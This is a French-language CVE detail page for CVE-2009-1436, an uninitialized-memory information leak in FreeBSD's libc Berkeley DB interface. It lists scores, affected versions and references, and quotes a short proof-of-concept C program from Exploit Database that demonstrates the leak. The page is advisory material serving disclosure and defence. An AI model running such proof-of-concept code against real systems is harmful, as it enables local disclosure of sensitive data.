CVE-2009-1436 : Détail

CVE-2009-1436

A03-Injection
0.04%V3
Local
2009-04-27
15h43 +00:00
2016-11-25
19h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The db interface in libc in FreeBSD 6.3, 6.4, 7.0, 7.1, and 7.2-PRERELEASE does not properly initialize memory for Berkeley DB 1.85 database structures, which allows local users to obtain sensitive information by reading a database file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.9 AV:L/AC:L/Au:N/C:C/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32946

Date de publication : 2009-01-14 23h00 +00:00
Auteur : Jaakko Heinonen
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/34666/info FreeBSD is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. #include <sys/types.h> #include <db.h> #include <err.h> #include <fcntl.h> #include <limits.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { const char data[] = "abcd"; DB *db; DBT dbt; /* * Set _malloc_options to "J" so that all memory obtained from * malloc(3) is iniatialized to 0x5a. See malloc(3) manual page * for additional information. */ _malloc_options = "J"; db = dbopen("test.db", O_RDWR | O_CREAT | O_TRUNC, 0644, DB_HASH, NULL); if (db == NULL) err(1, "dbopen()"); dbt.data = &data; dbt.size = sizeof(data); if (db->put(db, &dbt, &dbt, 0) != 0) err(1, "db->put()"); db->close(db); return (0); }

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 6.3

Freebsd>>Freebsd >> Version 6.3

    Freebsd>>Freebsd >> Version 6.4

    Freebsd>>Freebsd >> Version 6.4

      Freebsd>>Freebsd >> Version 6.4

        Freebsd>>Freebsd >> Version 7.0

        Freebsd>>Freebsd >> Version 7.0

          Freebsd>>Freebsd >> Version 7.1

          Freebsd>>Freebsd >> Version 7.1

            Freebsd>>Freebsd >> Version 7.2

              Références

              http://www.securityfocus.com/bid/34666
              Tags : vdb-entry, x_refsource_BID
              http://osvdb.org/53918
              Tags : vdb-entry, x_refsource_OSVDB
              http://secunia.com/advisories/34810
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.securitytracker.com/id?1022113
              Tags : vdb-entry, x_refsource_SECTRACK